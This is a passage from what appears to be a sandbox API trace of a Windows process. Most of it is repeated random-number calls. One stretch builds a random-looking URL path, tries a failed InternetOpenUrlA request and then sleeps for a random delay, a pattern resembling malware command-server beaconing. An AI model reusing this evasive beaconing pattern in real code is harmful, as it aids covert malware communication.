pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0171.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.530] GetProcessHeap () returned 0x440000 [0171.530] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0171.530] lstrcpyA (in: lpString1=0x473770, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0171.530] lstrcatA (in: lpString1="\x04", lpString2="/4FPPuu8h3l75ovxcbnezs1d86jqodx21mg3h39Jo/6b9fl7qYdnh8eFG4dxnpqSlqu7tyo9monIjV/" | out: lpString1="\x04/4FPPuu8h3l75ovxcbnezs1d86jqodx21mg3h39Jo/6b9fl7qYdnh8eFG4dxnpqSlqu7tyo9monIjV/") returned="\x04/4FPPuu8h3l75ovxcbnezs1d86jqodx21mg3h39Jo/6b9fl7qYdnh8eFG4dxnpqSlqu7tyo9monIjV/" [0171.530] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0171.530] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/4FPPuu8h3l75ovxcbnezs1d86jqodx21mg3h39Jo/6b9fl7qYdnh8eFG4dxnpqSlqu7tyo9monIjV/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0171.531] GetProcessHeap () returned 0x440000 [0171.531] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473770 | out: hHeap=0x440000) returned 1 [0171.531] GetProcessHeap () returned 0x440000 [0171.531] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0171.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0171.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0171.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0171.531] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0171.531] Sleep (dwMilliseconds=0x1093a) [0171.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0171.728] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.728] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0171.729] GetProcessHeap () returned 0x440000 [0171.729] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4900 [0171.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0171.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4901, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4d4901) returned 0x0 [0171.729] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.730] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.731] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.731] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.732] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.732] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.733] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.733] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0171.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d491a, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x4d491a) returned 0x0 [0171.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.734] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.734] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.735] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.735] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.736] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.736] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.737] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.738] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.739] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.739] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.740] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.740] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0171.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d493b, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x4d493b) returned 0x0 [0171.741] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.741] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.742] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.742] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0171.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.743] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0171.743] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0171.744] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 